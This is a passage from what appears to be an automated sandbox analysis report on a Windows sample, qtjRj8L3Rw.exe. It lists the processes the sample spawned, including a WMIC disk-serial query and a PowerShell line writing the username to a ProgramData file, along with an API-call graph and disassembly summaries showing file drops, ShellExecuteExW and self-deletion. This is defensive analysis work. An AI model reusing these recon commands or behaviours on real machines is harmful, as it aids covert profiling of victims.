                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\getmac.exe
                                Imagebase:0x50000
                                File size:65536 bytes
                                MD5 hash:6AB605BD2223BFB2E55A466BE9816914
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: WMIC.exe PID: 3788 Parent PID: 5312

                                General

                                Start time:14:15:05
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                Imagebase:0xd60000
                                File size:391680 bytes
                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 4704 Parent PID: 4384

                                General

                                Start time:14:15:09
                                Start date:12/01/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                Imagebase:0xb0000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 4736 Parent PID: 4704

                                General

                                Start time:14:15:09
                                Start date:12/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff658540000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: qtjRj8L3Rw.exe PID: 5732 Parent PID: 5072 qtjRj8L3Rw.exeUNIQUE

                                  Execution Graph

                                  Execution Coverage:2.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:11.1%
                                  Total number of Nodes:424
                                  Total number of Limit Nodes:17

                                  Graph

                                  execution_graph 24302 bd40b0 HeapDestroy std::ios_base::_Ios_base_dtor 24304 bf49a5 4 API calls 3 library calls 24306 bd1aa0 56 API calls 3 library calls 24307 be31a0 102 API calls 24309 be9fa0 82 API calls 24313 bd4090 HeapSize 24318 c091f4 39 API calls 3 library calls 24319 c097f8 6 API calls std::_Locinfo::_Locinfo_dtor 23686 c06680 GetStartupInfoW 23687 c0669d 23686->23687 23689 c06731 23686->23689 23687->23689 23692 c0c781 23687->23692 23690 c066c5 23690->23689 23691 c066f5 GetFileType 23690->23691 23691->23690 23693 c0c78d __FrameHandler3::FrameUnwindToState 23692->23693 23694 c0c796 23693->23694 23695 c0c7b7 23693->23695 23713 c01857 14 API calls __dosmaperr 23694->23713 23705 c052fb EnterCriticalSection 23695->23705 23698 c0c79b 23714 c01341 25 API calls __strnicoll 23698->23714 23700 c0c7ef 23715 c0c816 LeaveCriticalSection std::_Lockit::~_Lockit 23700->23715 23701 c0c7a5 23701->23690 23702 c0c7c3 23702->23700 23706 c0c6d1 23702->23706 23705->23702 23716 c06876 23706->23716 23708 c0c6f0 23724 c068d3 14 API calls __dosmaperr 23708->23724 23709 c0c6e3 23709->23708 23723 c09972 6 API calls std::_Locinfo::_Locinfo_dtor 23709->23723 23712 c0c745 23712->23702 23713->23698 23714->23701 23715->23701 23721 c06883 __dosmaperr 23716->23721 23717 c068c3 23726 c01857 14 API calls __dosmaperr 23717->23726 23718 c068ae RtlAllocateHeap 23719 c068c1 23718->23719 23718->23721 23719->23709 23721->23717 23721->23718 23725 c027bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23721->23725 23723->23709 23724->23712 23725->23721 23726->23719 24323 bfdafd 106 API calls ___scrt_uninitialize_crt 24103 bdeef0 24224 bda230 79 API calls 6 library calls 24103->24224 24105 bdef37 24106 bd40f0 40 API calls 24105->24106 24107 bdef4a 24106->24107 24108 bdf725 24107->24108 24109 bdef54 24107->24109 24110 bd3ea0 2 API calls 24108->24110 24112 be7040 37 API calls 24109->24112 24111 bdf72f 24110->24111 24113 c01351 25 API calls 24111->24113 24114 bdef6c 24112->24114 24115 bdf734 24113->24115 24116 bdef79 24114->24116 24118 be5750 29 API calls 24114->24118 24117 bd3ea0 2 API calls 24115->24117 24116->24111 24120 bdefa7 std::ios_base::_Ios_base_dtor 24116->24120 24119 bdf73e 24117->24119 24118->24116 24121 bd3ea0 2 API calls 24119->24121 24122 bd40f0 40 API calls 24120->24122 24124 bdf748 24121->24124 24123 bdefc8 24122->24123 24123->24115 24125 bdefd2 24123->24125 24126 bd3ea0 2 API calls 24124->24126 24129 be7040 37 API calls 24125->24129 24127 bdf752 24126->24127 24254 be72b0 24127->24254 24131 bdefee 24129->24131 24130 bdf757 24132 be72b0 2 API calls 24130->24132 24134 bdefff 24131->24134 24136 be5750 29 API calls 24131->24136 24133 bdf75c 24132->24133 24135 c01351 25 API calls 24133->24135 24225 be4f70 42 API calls 24134->24225 24138 bdf761 24135->24138 24136->24134 24140 c01351 25 API calls 24138->24140 24139 bdf012 24142 bd40f0 40 API calls 24139->24142 24141 bdf766 24140->24141 24143 bdf03b 24142->24143 24143->24119 24144 bdf045 24143->24144 24145 be7040 37 API calls 24144->24145 24146 bdf061 24145->24146 24147 bdf072 24146->24147 24148 be5750 29 API calls 24146->24148 24226 be4f70 42 API calls 24147->24226 24148->24147 24150 bdf088 24227 be4f70 42 API calls 24150->24227 24152 bdf09d 24153 bd40f0 40 API calls 24152->24153 24154 bdf0e4 24153->24154 24154->24124 24155 bdf0ee 24154->24155 24156 be7040 37 API calls 24155->24156 24157 bdf10a 24156->24157 24158 bdf11b 24157->24158 24159 be5750 29 API calls 24157->24159 24228 be4f70 42 API calls 24158->24228 24159->24158 24161 bdf131 24229 be4f70 42 API calls 24161->24229 24163 bdf146 CreateDirectoryW 24165 bdf1a0 24163->24165 24172 bdf49e 24165->24172 24230 be5870 54 API calls 24165->24230 24167 bdf1e7 24231 be8500 27 API calls 4 library calls 24167->24231 24169 bdf1ff 24232 be8500 27 API calls 4 library calls 24169->24232 24171 bdf219 24233 bd76a0 157 API calls 2 library calls 24171->24233 24172->24133 24174 bdf54c std::ios_base::_Ios_base_dtor 24172->24174 24176 bf44d0 _ValidateLocalCookies 5 API calls 24174->24176 24175 bdf227 24177 bdf232 SysAllocStringLen 24175->24177 24181 bdf551 24175->24181 24178 bdf721 24176->24178 24177->24127 24179 bdf24b SysAllocStringLen 24177->24179 24179->24130 24180 bdf25c 24179->24180 24249 bdec90 CoInitialize CoCreateInstance 24180->24249 24253 be5f90 25 API calls std::ios_base::_Ios_base_dtor 24181->24253 24183 bdf265 24184 bdf28e 24183->24184 24185 bdf269 24183->24185 24234 be8500 27 API calls 4 library calls 24184->24234 24250 bfc92f 24185->24250 24189 bdf29f 24235 bdeb40 132 API calls 24189->24235 24192 bdf2a9 24192->24181 24193 bdf2b4 CatchIt 24192->24193 24194 bd73a0 28 API calls 24193->24194 24223 bdf45f 24193->24223 24195 bdf300 24194->24195 24196 bdf30d 24195->24196 24236 be5870 54 API calls 24195->24236 24196->24195 24198 bdf318 24237 be5f90 25 API calls std::ios_base::_Ios_base_dtor 24198->24237 24200 bdf324 CatchIt 24201 bd73a0 28 API calls 24200->24201 24202 bdf356 24201->24202 24203 bdf363 24202->24203 24238 be5870 54 API calls 24202->24238 24203->24202 24205 bdf371 24239 be5f90 25 API calls std::ios_base::_Ios_base_dtor 24205->24239 24207 bdf37d 24240 be5870 54 API calls 24207->24240 24209 bdf38d 24241 be5870 54 API calls 24209->24241 24211 bdf39e 24242 be4f70 42 API calls 24211->24242 24213 bdf3b4 24243 be4f70 42 API calls 24213->24243 24215 bdf3cc 24244 be4f70 42 API calls 24215->24244 24217 bdf3e7 24245 be8500 27 API calls 4 library calls 24217->24245 24219 bdf431 24246 be8500 27 API calls 4 library calls 24219->24246 24221 bdf451 24247 bd9ce0 ShellExecuteExW WaitForSingleObject 24221->24247 24223->24172 24224->24105 24225->24139 24226->24150 24227->24152 24228->24161 24229->24163 24230->24167 24231->24169 24232->24171 24233->24175 24234->24189 24235->24192 24236->24198 24237->24200 24238->24205 24239->24207 24240->24209 24241->24211 24242->24213 24243->24215 24244->24217 24245->24219 24246->24221 24248 bd9d60 24247->24248 24248->24223 24249->24183 24257 c06f6d GetLastError 24250->24257 24253->24174 24255 bd3ea0 2 API calls 24254->24255 24256 be72ba 24255->24256 24258 c06f8a 24257->24258 24259 c06f84 24257->24259 24263 c06f90 SetLastError 24258->24263 24285 c09876 6 API calls std::_Locinfo::_Locinfo_dtor 24258->24285 24284 c09837 6 API calls std::_Locinfo::_Locinfo_dtor 24259->24284 24262 c06fa8 24262->24263 24264 c06876 __dosmaperr 14 API calls 24262->24264 24269 c07024 24263->24269 24270 bdf26e SleepEx DeleteFileW 24263->24270 24266 c06fb8 24264->24266 24267 c06fc0 24266->24267 24268 c06fd7 24266->24268 24286 c09876 6 API calls std::_Locinfo::_Locinfo_dtor 24267->24286 24288 c09876 6 API calls std::_Locinfo::_Locinfo_dtor 24268->24288 24292 c05e99 79 API calls __FrameHandler3::FrameUnwindToState 24269->24292 24270->24184 24275 c06fe3 24277 c06fe7 24275->24277 24278 c06ff8 24275->24278 24276 c06fce 24287 c068d3 14 API calls __dosmaperr 24276->24287 24289 c09876 6 API calls std::_Locinfo::_Locinfo_dtor 24277->24289 24290 c06d9b 14 API calls __dosmaperr 24278->24290 24282 c07003 24291 c068d3 14 API calls __dosmaperr 24282->24291 24284->24258 24285->24262 24286->24276 24287->24263 24288->24275 24289->24276 24290->24282 24291->24263 24325 be31f0 104 API calls 24327 bfa1f0 RtlUnwind 24328 bf69f0 6 API calls 3 library calls 24329 bf4eef GetStartupInfoW ___scrt_fastfail 24331 c057a0 82 API calls 5 library calls 24332 bf4add 113 API calls ___scrt_uninitialize_crt 24333 bf5dd6 DeleteCriticalSection 24334 c05fab 17 API calls 24336 be61d0 107 API calls std::ios_base::_Ios_base_dtor 24339 be35d0 39 API calls 2 library calls 24341 bf4dcb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24342 c097b9 6 API calls std::_Locinfo::_Locinfo_dtor 24343 c052ba 7 API calls __wsopen_s 24344 bd1cc0 56 API calls 24346 be37c0 30 API calls 4 library calls 24347 bf683b 91 API calls 2 library calls 24350 bd4030 HeapFree 24351 bd1130 31 API calls 24354 bed730 79 API calls __dosmaperr 23738 c02c5b 23741 c02af9 23738->23741 23742 c02b07 23741->23742 23743 c02b19 23741->23743 23769 bf4f25 GetModuleHandleW 23742->23769 23753 c029a0 23743->23753 23746 c02b0c 23746->23743 23770 c02b9f GetModuleHandleExW 23746->23770 23748 c02b52 23751 c02b5c 23754 c029ac __FrameHandler3::FrameUnwindToState 23753->23754 23776 c052fb EnterCriticalSection 23754->23776 23756 c029b6 23777 c02a0c 23756->23777 23761 c02b5d 24098 c0af0e GetPEB 23761->24098 23764 c02b8c 23767 c02b9f __FrameHandler3::FrameUnwindToState 3 API calls 23764->23767 23765 c02b6c GetPEB 23765->23764 23766 c02b7c GetCurrentProcess TerminateProcess 23765->23766 23766->23764 23768 c02b94 ExitProcess 23767->23768 23769->23746 23771 c02be1 23770->23771 23772 c02bbe GetProcAddress 23770->23772 23774 c02b18 23771->23774 23775 c02be7 FreeLibrary 23771->23775 23773 c02bd3 23772->23773 23773->23771 23774->23743 23775->23774 23776->23756 23778 c02a18 __FrameHandler3::FrameUnwindToState 23777->23778 23779 c02a79 23778->23779 23784 c029c3 23778->23784 23788 c0365a 14 API calls __FrameHandler3::FrameUnwindToState 23778->23788 23780 c02a96 23779->23780 23789 c038ed 23779->23789 23783 c038ed __FrameHandler3::FrameUnwindToState 79 API calls 23780->23783 23783->23784 23785 c029e1 23784->23785 24097 c05343 LeaveCriticalSection 23785->24097 23787 c029cf 23787->23748 23787->23761 23788->23779 23790 c03911 23789->23790 23791 c0392d 23789->23791 23790->23791 23793 bd11f0 23790->23793 23791->23780 23941 c02707 23793->23941 23798 bd122d 23969 be7040 23798->23969 23799 bd1278 24005 bd3ea0 23799->24005 23804 bd12d8 24021 bd73a0 23804->24021 23805 bd124c 23807 bd125b 23805->23807 23991 be5750 23805->23991 24004 bf4b32 28 API calls 23807->24004 23811 bd1265 23811->23790 23812 bd40f0 40 API calls 23813 bd1317 23812->23813 23814 bd13d8 23813->23814 23815 bd1321 23813->23815 23816 bd3ea0 2 API calls 23814->23816 23819 be7040 37 API calls 23815->23819 23817 bd13e2 23816->23817 24050 c01351 23817->24050 23821 bd133b 23819->23821 23823 bd1348 23821->23823 23824 be5750 29 API calls 23821->23824 24041 be4f70 42 API calls 23823->24041 23824->23823 23829 bd13a7 std::ios_base::_Ios_base_dtor 24042 bf4b32 28 API calls 23829->24042 23830 bd135f 23830->23817 23830->23829 23834 bd13bb 24043 bf44d0 23834->24043 23838 bd13d4 23838->23790 23942 c0261b __FrameHandler3::FrameUnwindToState 23941->23942 23943 c0262e 23942->23943 23947 c02654 23942->23947 24055 c01857 14 API calls __dosmaperr 23943->24055 23945 c02633 24056 c01341 25 API calls __strnicoll 23945->24056 24057 c052fb EnterCriticalSection 23947->24057 23948 bd121d 23954 bd40f0 23948->23954 23950 c0265f 24058 c0269a 79 API calls __strnicoll 23950->24058 23952 c0266a 24059 c02691 LeaveCriticalSection std::_Lockit::~_Lockit 23952->24059 23955 bd411a 23954->23955 23967 bd4106 23954->23967 24060 bf45f5 6 API calls 23955->24060 23957 bd4124 23959 bd4130 GetProcessHeap 23957->23959 23957->23967 24061 bf4b32 28 API calls 23959->24061 23960 bd416f 23968 bd1227 23960->23968 24064 bf4b32 28 API calls 23960->24064 23963 bd4156 24062 bf45ab EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 23963->24062 23964 bd41c8 24065 bf45ab EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 23964->24065 23967->23968 24063 bf45f5 6 API calls 23967->24063 23968->23798 23968->23799 23970 be70b5 23969->23970 23971 be7050 23969->23971 23970->23805 23971->23970 24066 bf65a2 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 23971->24066 23973 be7080 FindResourceExW 23974 be706c 23973->23974 23974->23970 23974->23973 23977 be70c2 23974->23977 24067 bd3fb0 LoadResource LockResource SizeofResource 23974->24067 24068 bf65a2 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 23974->24068 23977->23970 23978 be70c6 FindResourceW 23977->23978 23978->23970 23979 be70d4 23978->23979 24069 bd3fb0 LoadResource LockResource SizeofResource 23979->24069 23981 be70e0 23981->23970 23983 be710f 23981->23983 24070 be8590 27 API calls 23981->24070 24071 bfa32e 25 API calls 4 library calls 23983->24071 23985 be7128 24072 bd3ee0 GetLastError RaiseException 23985->24072 23987 be712e 23988 be7138 23987->23988 23989 bd3ea0 2 API calls 23987->23989 23988->23805 23990 be715a 23989->23990 23992 be57be 23991->23992 23993 be575f MultiByteToWideChar 23991->23993 24074 be73e0 GetLastError RaiseException 23992->24074 23993->23992 23994 be5777 23993->23994 23997 be5794 MultiByteToWideChar 23994->23997 24073 be8590 27 API calls 23994->24073 23996 be57c5 23996->23807 23999 be57ce 23997->23999 24000 be57aa 23997->24000 24001 bd3ea0 2 API calls 23999->24001 24000->23807 24003 be57d8 24001->24003 24002 be5792 24002->23997 24004->23811 24006 bd3eae 24005->24006 24075 bf731a 24006->24075 24008 bd3ebb GetLastError 24010 bd3eca 24008->24010 24011 bd3ea0 RaiseException 24010->24011 24012 bd3ed8 24011->24012 24013 bd1282 24012->24013 24014 bd3f07 24012->24014 24015 bd3f11 24012->24015 24016 bd3ea0 RaiseException 24012->24016 24020 be8b10 27 API calls 2 library calls 24013->24020 24017 bd3ea0 RaiseException 24014->24017 24018 bd3ea0 RaiseException 24015->24018 24016->24014 24017->24015 24019 bd3f1b 24018->24019 24020->23804 24078 bd6a20 24021->24078 24025 bd7411 24028 bd7439 _Yarn 24025->24028 24090 be8b10 27 API calls 2 library calls 24025->24090 24027 be6140 27 API calls 24029 bd7493 std::ios_base::_Ios_base_dtor 24027->24029 24028->24027 24030 bd768a 24029->24030 24032 bd7560 std::ios_base::_Ios_base_dtor 24029->24032 24031 c01351 25 API calls 24030->24031 24033 bd768f 24031->24033 24032->24033 24034 bd75fb std::ios_base::_Ios_base_dtor 24032->24034 24035 c01351 25 API calls 24033->24035 24036 bf44d0 _ValidateLocalCookies 5 API calls 24034->24036 24037 bd7694 24035->24037 24038 bd12fe 24036->24038 24039 c01351 25 API calls 24037->24039 24038->23812 24040 bd7699 24039->24040 24041->23830 24042->23834 24044 bf44db IsProcessorFeaturePresent 24043->24044 24045 bf44d9 24043->24045 24047 bf4707 24044->24047 24045->23838 24094 bf46cb SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24047->24094 24049 bf47ea 24049->23838 24095 c012dd 25 API calls 3 library calls 24050->24095 24052 c01360 24096 c0136e 11 API calls __FrameHandler3::FrameUnwindToState 24052->24096 24054 c0136d 24055->23945 24056->23948 24057->23950 24058->23952 24059->23948 24060->23957 24061->23963 24062->23967 24063->23960 24064->23964 24065->23968 24066->23974 24067->23974 24068->23974 24069->23981 24070->23983 24071->23985 24072->23987 24073->24002 24074->23996 24076 bf7334 24075->24076 24077 bf7361 RaiseException 24075->24077 24076->24077 24077->24008 24079 bd6a45 24078->24079 24091 be5e20 27 API calls 3 library calls 24079->24091 24081 bd6a84 24084 bd6b8e 24081->24084 24092 bf47ec 5 API calls ___report_securityfailure 24081->24092 24083 bd6c5e 24085 be6140 24084->24085 24086 be6165 24085->24086 24087 be616c 24086->24087 24093 be8b10 27 API calls 2 library calls 24086->24093 24087->24025 24089 be619e _Yarn 24089->24025 24090->24028 24091->24081 24092->24083 24093->24089 24094->24049 24095->24052 24096->24054 24097->23787 24099 c02b67 24098->24099 24100 c0af28 24098->24100 24099->23764 24099->23765 24102 c096a9 5 API calls std::_Locinfo::_Locinfo_dtor 24100->24102 24102->24099 24357 bd2220 26 API calls ___std_exception_copy 24358 c08e5d 126 API calls __wsopen_s 24359 bf5722 16 API calls 2 library calls 24366 bf5e17 DecodePointer 24367 bd4010 HeapAlloc 24370 be3b10 28 API calls 24371 c02c71 26 API calls 3 library calls 24375 be3e00 25 API calls std::ios_base::_Ios_base_dtor 24378 bf4f74 89 API calls _unexpected 24293 c0690d 24294 c0694b 24293->24294 24295 c0691b __dosmaperr 24293->24295 24301 c01857 14 API calls __dosmaperr 24294->24301 24295->24294 24297 c06936 RtlAllocateHeap 24295->24297 24300 c027bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 24295->24300 24297->24295 24298 c06949 24297->24298 24300->24295 24301->24298 24379 bd2170 14 API calls 2 library calls 24380 bdf770 35 API calls 24381 c0640f 104 API calls 2 library calls 23727 bf496c 23728 bf4975 23727->23728 23735 bf5007 IsProcessorFeaturePresent 23728->23735 23730 bf4981 23736 bf7186 10 API calls 2 library calls 23730->23736 23732 bf4986 23734 bf498a 23732->23734 23737 bf71a5 7 API calls 2 library calls 23732->23737 23735->23730 23736->23732 23737->23734 24385 bd2760 27 API calls 24386 bf5961 9 API calls 3 library calls 24389 bd4050 HeapReAlloc 24391 bd9750 53 API calls _Yarn 24395 c09b2f FreeLibrary 24398 bd2a40 84 API calls 24399 bdda40 140 API calls 2 library calls

                                  Executed Functions

                                  Function 00BD11F0, Relevance: 9.5, Strings: 7, Instructions: 734UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 212 bd11f0-bd122b call c02707 call bd40f0 217 bd122d-bd124e call be7040 212->217 218 bd1278-bd130e call bd3ea0 call be8b10 call bd73a0 212->218 227 bd125b-bd1277 call bf4b32 217->227 228 bd1250-bd1256 call be5750 217->228 232 bd1310 218->232 233 bd1312-bd131b call bd40f0 218->233 228->227 232->233 237 bd13d8-bd13dd call bd3ea0 233->237 238 bd1321-bd133d call be7040 233->238 240 bd13e2-bd146e call c01351 call be8b10 call bd73a0 237->240 247 bd133f-bd1343 call be5750 238->247 248 bd1348-bd1377 call be4f70 238->248 259 bd1470 240->259 260 bd1472-bd147b call bd40f0 240->260 247->248 254 bd1379-bd137c 248->254 255 bd1381-bd1387 248->255 254->255 257 bd1389-bd1395 255->257 258 bd13b1-bd13d7 call bf4b32 call bf44d0 255->258 261 bd13a7-bd13ae call bf4b47 257->261 262 bd1397-bd13a5 257->262 259->260 269 bd1538-bd153d call bd3ea0 260->269 270 bd1481-bd149d call be7040 260->270 261->258 262->240 262->261 275 bd1542-bd15ce call c01351 call be8b10 call bd73a0 269->275 280 bd149f-bd14a3 call be5750 270->280 281 bd14a8-bd14d7 call be4f70 270->281 293 bd15d0 275->293 294 bd15d2-bd15db call bd40f0 275->294 280->281 288 bd14d9-bd14dc 281->288 289 bd14e1-bd14e7 281->289 288->289 291 bd14e9-bd14f5 289->291 292 bd1511-bd1537 call bf4b32 call bf44d0 289->292 297 bd1507-bd150e call bf4b47 291->297 298 bd14f7-bd1505 291->298 293->294 302 bd1698-bd169d call bd3ea0 294->302 303 bd15e1-bd15fd call be7040 294->303 297->292 298->275 298->297 309 bd16a2-bd173b call c01351 call be8b10 call bd73a0 302->309 314 bd15ff-bd1603 call be5750 303->314 315 bd1608-bd1637 call be4f70 303->315 325 bd173d 309->325 326 bd173f-bd1748 call bd40f0 309->326 314->315 323 bd1639-bd163c 315->323 324 bd1641-bd1647 315->324 323->324 327 bd1649-bd1655 324->327 328 bd1671-bd1697 call bf4b32 call bf44d0 324->328 325->326 337 bd174e-bd176e call be7040 326->337 338 bd17d2-bd17d7 call bd3ea0 326->338 329 bd1667-bd166e call bf4b47 327->329 330 bd1657-bd1665 327->330 329->328 330->309 330->329 348 bd177b-bd1781 337->348 349 bd1770-bd1776 call be5750 337->349 343 bd17dc-bd181f call c01351 call bd40f0 338->343 358 bd1825-bd1846 call be7040 343->358 359 bd18e2-bd1979 call bd3ea0 call be8b10 call bd73a0 343->359 352 bd17ab-bd17d1 call bf4b32 call bf44d0 348->352 353 bd1783-bd178f 348->353 349->348 356 bd17a1-bd17a8 call bf4b47 353->356 357 bd1791-bd179f 353->357 356->352 357->343 357->356 372 bd1848-bd1850 call be5750 358->372 373 bd1855-bd189c call be4f70 * 2 358->373 379 bd197d-bd1986 call bd40f0 359->379 380 bd197b 359->380 372->373 385 bd189e-bd18a1 373->385 386 bd18a6-bd18bb 373->386 387 bd198c-bd19a8 call be7040 379->387 388 bd1a43-bd1a48 call bd3ea0 379->388 380->379 385->386 390 bd18bd-bd18c0 386->390 391 bd18c5-bd18e1 call bf4b32 386->391 400 bd19aa-bd19ae call be5750 387->400 401 bd19b3-bd19e2 call be4f70 387->401 394 bd1a4d-bd1a9b call c01351 call bd73a0 call bf4b32 388->394 390->391 400->401 408 bd19ec-bd19f2 401->408 409 bd19e4-bd19e7 401->409 411 bd1a1c-bd1a42 call bf4b32 call bf44d0 408->411 412 bd19f4-bd1a00 408->412 409->408 414 bd1a12-bd1a19 call bf4b47 412->414 415 bd1a02-bd1a10 412->415 414->411 415->394 415->414
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$FindResource
                                  • String ID: ER4uCCkuRzRjHSU=$ERk1CSozUSoHMgUm$ERo+FTkkXQMiJxA=$ESQuBT8uQyglJy4QOicGXDMiayYtPQ==$JC4hHg4UeRQmIQcuMCxMVjw0$SystemDrive$`
                                  • API String ID: 3073988107-3092437485
                                  • Opcode ID: 1dc65200f98c395a9e37f2b8907bf4561ddc256f631bf711426f828138aa4896
                                  • Instruction ID: ab8801cd409ec03369ebc319dbcf3f5da797234246d8e736886faecd5aac626c
                                  • Opcode Fuzzy Hash: 1dc65200f98c395a9e37f2b8907bf4561ddc256f631bf711426f828138aa4896
                                  • Instruction Fuzzy Hash: 5B3247719002449BEB14EF78DC05BAEF7F4EF01310F1486ADE815AB792EB75A944CBA1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C02B5D, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 494 c02b5d-c02b6a call c0af0e 497 c02b8c-c02b98 call c02b9f ExitProcess 494->497 498 c02b6c-c02b7a GetPEB 494->498 498->497 499 c02b7c-c02b86 GetCurrentProcess TerminateProcess 498->499 499->497
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,?,00C02B5C,?,?,00000000,?,00000000,00000000), ref: 00C02B7F
                                  • TerminateProcess.KERNEL32(00000000,?,00C02B5C,?,?,00000000,?,00000000,00000000), ref: 00C02B86
                                  • ExitProcess.KERNEL32 ref: 00C02B98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 0404ee28ee20772327f5b603d54d95f48830eeb2d2d559ed537205aa7c6d5273
                                  • Instruction ID: bfe20f53f095591179c574d8e74aa3405f76692b8734226fcf353bde9da6fb01
                                  • Opcode Fuzzy Hash: 0404ee28ee20772327f5b603d54d95f48830eeb2d2d559ed537205aa7c6d5273
                                  • Instruction Fuzzy Hash: AAE04631001209ABCB162F64CD0CF8C3F28FB09351B004411F80A86172CB35DE81EA91
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 00BDEEF0, Relevance: 70.7, APIs: 5, Strings: 35, Instructions: 656memoryfileUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 bdeef0-bdef41 call bda230 3 bdef45-bdef4e call bd40f0 0->3 4 bdef43 0->4 7 bdf725-bdf72a call bd3ea0 3->7 8 bdef54-bdef6e call be7040 3->8 4->3 11 bdf72f call c01351 7->11 16 bdef79-bdef83 8->16 17 bdef70-bdef74 call be5750 8->17 15 bdf734-bdf739 call bd3ea0 11->15 20 bdf73e-bdf743 call bd3ea0 15->20 21 bdef85-bdef91 16->21 22 bdefb1-bdefcc call bd40f0 16->22 17->16 28 bdf748-bdf74d call bd3ea0 20->28 24 bdefa7-bdefae call bf4b47 21->24 25 bdef93-bdefa1 21->25 22->15 30 bdefd2-bdeff0 call be7040 22->30 24->22 25->11 25->24 33 bdf752 call be72b0 28->33 41 bdefff-bdf02c call be4f70 30->41 42 bdeff2-bdeffa call be5750 30->42 37 bdf757 call be72b0 33->37 40 bdf75c-bdf766 call c01351 * 2 37->40 49 bdf02e-bdf031 41->49 50 bdf036-bdf03f call bd40f0 41->50 42->41 49->50 50->20 54 bdf045-bdf063 call be7040 50->54 58 bdf065-bdf06d call be5750 54->58 59 bdf072-bdf0b7 call be4f70 * 2 54->59 58->59 65 bdf0b9-bdf0bc 59->65 66 bdf0c1-bdf0d5 59->66 65->66 67 bdf0df-bdf0e8 call bd40f0 66->67 68 bdf0d7-bdf0da 66->68 67->28 71 bdf0ee-bdf10c call be7040 67->71 68->67 75 bdf10e-bdf116 call be5750 71->75 76 bdf11b-bdf160 call be4f70 * 2 71->76 75->76 82 bdf16a-bdf17e 76->82 83 bdf162-bdf165 76->83 84 bdf188-bdf19b CreateDirectoryW 82->84 85 bdf180-bdf183 82->85 83->82 86 bdf1a0-bdf1a6 84->86 85->84 87 bdf1a8-bdf1ab 86->87 88 bdf1c6-bdf1c8 86->88 89 bdf1ad-bdf1b5 87->89 90 bdf1c2-bdf1c4 87->90 91 bdf1cb-bdf1cd 88->91 89->88 92 bdf1b7-bdf1c0 89->92 90->91 93 bdf49e-bdf4b2 91->93 94 bdf1d3-bdf22c call be5870 call be8500 * 2 call bd76a0 91->94 92->86 92->90 95 bdf4bc-bdf4d0 93->95 96 bdf4b4-bdf4b7 93->96 124 bdf551-bdf565 94->124 125 bdf232-bdf245 SysAllocStringLen 94->125 98 bdf4da-bdf4ee 95->98 99 